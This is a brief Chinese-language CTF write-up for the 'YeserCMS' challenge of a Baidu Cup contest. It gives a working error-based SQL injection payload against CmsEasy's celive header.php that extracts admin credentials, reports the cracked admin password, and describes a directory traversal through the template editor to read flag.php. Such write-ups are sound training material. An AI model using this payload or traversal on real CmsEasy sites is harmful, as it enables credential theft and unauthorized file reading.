百度杯”CTF比赛 九月场YeserCMS

百度杯”CTF比赛 九月场YeserCMS
           

打开网站，看见YESERCMS，查了下好像没有这个CMS，直接CMS指纹识别一下，发现是CMSEASY。

网上找相关GETSHELL漏洞，发现一个伪造IP进入后台的洞，但是PING不通，暂时无法获得准确的IP地址，最后在http://www.hacksec.cn/codesec/378.html博客上发现SQL注入漏洞。

POC:

http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads /celive/live/header.php

xajax=LiveMessage&xajaxargs[0]=name’, (UpdateXML(1,CONCAT(0x5b,mid((SELECTGROUP_CONCAT(concat(username,’|’,password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)–%20

发现URL不能访问，查看其它的注入文章时（https://www.secpulse.com/archives/41265.html）发现将upload目录去掉。

注入结果：Table ‘Yeser.cmseasy_user’ doesn’t exist

可能不是原本的数据库，先猜测数据库名称为yesercms_user,修改查询的长度，得到完整的账户密码。

XPATH syntax error: '[admin|ff512d4240cbbdeafada404677ccb

MD5：Yeser231

在专题目录尝试一句话木马，木马上传成功，但是无法访问

题目提示flag.php在根目录，在模板编辑页面发现可以编辑html的内容，抓包可以看出通过ID参数获取HTML的内容，尝试目录遍历最终在…/…/flag.php中获取到flag的内容